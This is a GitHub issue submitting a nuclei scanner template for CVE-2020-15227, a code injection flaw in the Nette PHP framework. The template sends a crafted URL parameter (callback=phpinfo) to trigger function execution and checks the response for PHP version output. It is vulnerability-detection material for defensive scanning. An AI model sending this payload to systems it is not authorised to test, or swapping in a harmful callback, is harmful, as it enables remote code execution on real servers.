### ISSUE TITLE
[nuclei-template] CVE-2020-15227

### ISSUE THREAD

**Issue by Becivells** [projectdiscovery/nuclei-templates#1518]
**Template Details**
Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
```yaml
id: CVE-2020-15227

info:
  name: nette-Framework  RCE
  author: becivells
  severity: high
  reference: https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
  tags: cve,cve2020,nette,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/nette.micro/?callback=phpinfo&what=-1"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "phpinfo"
          - "PHP Version"
        part: body
        condition: and

      - type: status
        status:
          - 200
```
